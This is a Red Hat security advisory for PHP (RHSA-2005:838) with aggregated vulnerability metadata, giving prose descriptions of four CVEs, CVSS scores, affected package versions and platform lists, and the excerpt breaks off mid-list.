ID RHSA-2005:838 Type redhat Reporter RedHat Modified 2018-03-14T19:26:00
Description
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Web server.
A flaw was found in the way PHP registers global variables during a file
upload request. A remote attacker could submit a carefully crafted
multipart/form-data POST request that would overwrite the $GLOBALS array,
altering expected script behavior, and possibly leading to the execution of
arbitrary PHP commands. Note that this vulnerability only affects
installations which have register_globals enabled in the PHP configuration
file, which is not a default or recommended option. The Common
Vulnerabilities and Exposures project assigned the name CVE-2005-3390 to
this issue.
A flaw was found in the PHP parse_str() function. If a PHP script passes
only one argument to the parse_str() function, and the script can be forced
to abort execution during operation (for example due to the memory_limit
setting), the register_globals may be enabled even if it is disabled in the
PHP configuration file. This vulnerability only affects installations that
have PHP scripts using the parse_str function in this way. (CVE-2005-3389)
A Cross-Site Scripting flaw was found in the phpinfo() function. If a
victim can be tricked into following a malicious URL to a site with a page
displaying the phpinfo() output, it may be possible to inject javascript
or HTML content into the displayed page or steal data such as cookies.
This vulnerability only affects installations which allow users to view the
output of the phpinfo() function. As the phpinfo() function outputs a
large amount of information about the current state of PHP, it should only
be used during debugging or if protected by authentication. (CVE-2005-3388)
Additionally, a bug introduced in the updates to fix CVE-2004-1019 has been
corrected.
Users of PHP should upgrade to these updated packages, which contain
backported patches that resolve these issues.
{"id": "RHSA-2005:838", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2005:838) php security update", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA flaw was found in the way PHP registers global variables during a file\r\nupload request. A remote attacker could submit a carefully crafted\r\nmultipart/form-data POST request that would overwrite the $GLOBALS array,\r\naltering expected script behavior, and possibly leading to the execution of\r\narbitrary PHP commands. Note that this vulnerability only affects\r\ninstallations which have register_globals enabled in the PHP configuration\r\nfile, which is not a default or recommended option. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2005-3390 to\r\nthis issue.\r\n\r\nA flaw was found in the PHP parse_str() function. If a PHP script passes\r\nonly one argument to the parse_str() function, and the script can be forced\r\nto abort execution during operation (for example due to the memory_limit\r\nsetting), the register_globals may be enabled even if it is disabled in the\r\nPHP configuration file. This vulnerability only affects installations that\r\nhave PHP scripts using the parse_str function in this way. (CVE-2005-3389)\r\n\r\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\r\nvictim can be tricked into following a malicious URL to a site with a page\r\ndisplaying the phpinfo() output, it may be possible to inject javascript\r\nor HTML content into the displayed page or steal data such as cookies. \r\nThis vulnerability only affects installations which allow users to view the\r\noutput of the phpinfo() function. As the phpinfo() function outputs a\r\nlarge amount of information about the current state of PHP, it should only\r\nbe used during debugging or if protected by authentication. (CVE-2005-3388)\r\n\r\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has been\r\ncorrected.\r\n\r\nUsers of PHP should upgrade to these updated packages, which contain\r\nbackported patches that resolve these issues.", "published": "2005-11-10T05:00:00", "modified": "2018-03-14T19:26:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2005:838", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2004-1019", "CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390"], "lastseen": "2019-08-13T18:45:37", "viewCount": 10, "enchantments": {"score": {"value": 9.1, "vector": "NONE", "modified": "2019-08-13T18:45:37", "rev": 2}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2005:1110-001", "CESA-2005:838-01", "CESA-2005:831"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2005-838.NASL", "MANDRAKE_MDKSA-2005-213.NASL", "REDHAT-RHSA-2005-831.NASL", "SUSE_SA_2005_069.NASL", "FEDORA_2005-1061.NASL", "FEDORA_2005-1062.NASL", "PHP_4_4_1.NASL", "UBUNTU_USN-232-1.NASL", "GENTOO_GLSA-200511-08.NASL", "CENTOS_RHSA-2005-831.NASL"]}, {"type": "cve", "idList": ["CVE-2005-3389", "CVE-2005-3390", "CVE-2005-3388", "CVE-2004-1019"]}, {"type": "redhat", "idList": ["RHSA-2005:031", "RHSA-2005:831", "RHSA-2005:032", "RHSA-2004:687"]}, {"type": "openvas", "idList": ["OPENVAS:55857", "OPENVAS:1361412562310120454", "OPENVAS:65581", "OPENVAS:55777", "OPENVAS:1361412562310877982", "OPENVAS:136141256231065581", "OPENVAS:65242", "OPENVAS:1361412562310120450", "OPENVAS:52269", "OPENVAS:136141256231065242"]}, {"type": "gentoo", "idList": ["GLSA-200412-14", "GLSA-200511-08"]}, {"type": "ubuntu", "idList": ["USN-232-1", "USN-40-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:1818", "SECURITYVULNS:DOC:14915", "SECURITYVULNS:VULN:14172", "SECURITYVULNS:DOC:7349"]}, {"type": "osvdb", "idList": ["OSVDB:20406", "OSVDB:20408", "OSVDB:20407", "OSVDB:12415"]}, {"type": "exploitdb", "idList": ["EDB-ID:26442", "EDB-ID:26443"]}, {"type": "suse", "idList": ["SUSE-SA:2005:002", "SUSE-SU-2015:0365-1", "SUSE-SU-2016:1638-1", "SUSE-SA:2005:069"]}, {"type": "fedora", "idList": ["FEDORA:87D4330CDA96"]}, {"type": "amazon", "idList": ["ALAS-2015-463", "ALAS-2015-464"]}, {"type": "f5", "idList": ["F5:K16021", "SOL16021"]}, {"type": "freebsd", "idList": ["D47E9D19-5016-11D9-9B5F-0050569F0001"]}], "modified": "2019-08-13T18:45:37", "rev": 2}, "vulnersScore": 9.1}, "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-imap", "packageVersion": "4.1.2-2.3", "packageFilename": "php-imap-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-odbc", "packageVersion": "4.1.2-2.3", "packageFilename": "php-odbc-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-manual", "packageVersion": "4.1.2-2.3", "packageFilename": "php-manual-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-ldap", "packageVersion": "4.1.2-2.3", "packageFilename": "php-ldap-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-devel", "packageVersion": "4.1.2-2.3", "packageFilename": "php-devel-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-ldap", "packageVersion": "4.1.2-2.3", "packageFilename": "php-ldap-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-imap", "packageVersion": "4.1.2-2.3", "packageFilename": "php-imap-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-manual", "packageVersion": "4.1.2-2.3", "packageFilename": "php-manual-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-mysql", "packageVersion": "4.1.2-2.3", "packageFilename": "php-mysql-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-devel", "packageVersion": "4.1.2-2.3", "packageFilename": "php-devel-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php", "packageVersion": "4.1.2-2.3", "packageFilename": "php-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-pgsql", "packageVersion": "4.1.2-2.3", "packageFilename": "php-pgsql-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "ia64", "packageName": "php-pgsql", "packageVersion": "4.1.2-2.3", "packageFilename": "php-pgsql-4.1.2-2.3.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php", "packageVersion": "4.1.2-2.3", "packageFilename": "php-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-mysql", "packageVersion": "4.1.2-2.3", "packageFilename": "php-mysql-4.1.2-2.3.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "arch": "i386", "packageName": "php-odbc", "packageVersion": "4.1.2-2.3", "packageFilename": "php-odbc-4.1.2-2.3.i386.rpm", "operator": "lt"}]}
{"cve": [{"lastseen": "2021-02-02T05:24:39", "description": "The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when register_globals is enabled, allows remote attackers to modify the GLOBALS array and bypass security protections of PHP applications via a multipart/form-data POST request with a \"GLOBALS\" fileupload field.", "edition": 4, "cvss3": {}, "published": "2005-11-01T12:47:00", "title": "CVE-2005-3390", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3390"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3390", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:24:39", "description": "Cross-site scripting (XSS) vulnerability in the phpinfo function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a \"stacked array assignment.\"", "edition": 5, "cvss3": {}, "published": "2005-11-01T12:47:00", "title": "CVE-2005-3388", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3388"], "modified": "2020-06-23T03:15:00", "cpe": ["cpe:/a:php:php:4.4.0", "cpe:/a:php:php:4.0.4", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:4.3.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.3.10", "cpe:/a:php:php:4.2.1", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:4.0.0", "cpe:/a:php:php:4.3.11", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/a:php:php:4.3.3", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:4.0.6"], "id": "CVE-2005-3388", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3388", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:22:59", "description": "The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger \"information disclosure, double-free and negative reference index array underflow\" results.", "edition": 4, "cvss3": {}, "published": "2005-01-10T05:00:00", "title": "CVE-2004-1019", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1019"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:4.0.4", "cpe:/o:trustix:secure_linux:2.0", "cpe:/a:php:php:5.0", "cpe:/a:php:php:3.0.11", "cpe:/a:php:php:3.0.17", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:3.0.12", "cpe:/a:php:php:4.0", "cpe:/a:php:php:3.0.15", "cpe:/a:php:php:4.3.6", "cpe:/a:php:php:4.3.0", "cpe:/a:php:php:4.0.2", "cpe:/a:php:php:4.0.7", "cpe:/a:openpkg:openpkg:current", "cpe:/a:php:php:4.3.7", "cpe:/a:php:php:3.0.16", "cpe:/a:php:php:4.3.4", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:php:php:3.0.9", "cpe:/a:php:php:3.0.4", "cpe:/a:php:php:4.3.5", "cpe:/a:php:php:3.0.8", "cpe:/a:php:php:4.2.0", "cpe:/a:php:php:3.0.2", "cpe:/a:php:php:3.0", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:3.0.1", "cpe:/a:php:php:4.3.2", "cpe:/a:php:php:3.0.14", "cpe:/a:php:php:4.2", "cpe:/a:php:php:4.3.1", "cpe:/a:php:php:4.2.1", "cpe:/a:openpkg:openpkg:2.1", "cpe:/a:php:php:3.0.7", "cpe:/a:php:php:4.1.2", "cpe:/a:php:php:3.0.3", "cpe:/a:php:php:4.1.0", "cpe:/a:php:php:4.0.5", "cpe:/a:php:php:4.3.8", "cpe:/o:trustix:secure_linux:2.2", "cpe:/a:php:php:4.3.3", "cpe:/a:openpkg:openpkg:2.2", "cpe:/a:php:php:3.0.10", "cpe:/a:php:php:4.3.9", "cpe:/a:php:php:4.0.3", "cpe:/o:ubuntu:ubuntu_linux:4.1", "cpe:/a:php:php:4.2.2", "cpe:/a:php:php:3.0.13", "cpe:/a:php:php:3.0.5", "cpe:/a:php:php:4.0.1", "cpe:/a:php:php:3.0.6", "cpe:/a:php:php:4.2.3", "cpe:/a:php:php:4.1.1", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:3.0.18", "cpe:/a:php:php:4.0.6"], "id": "CVE-2004-1019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:ubuntu:ubuntu_linux:4.1:*:ppc:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:current:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2:*:dev:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:patch2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:4.1:*:ia64:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:openpkg:openpkg:2.1:*:*:*:*:*:*:*", 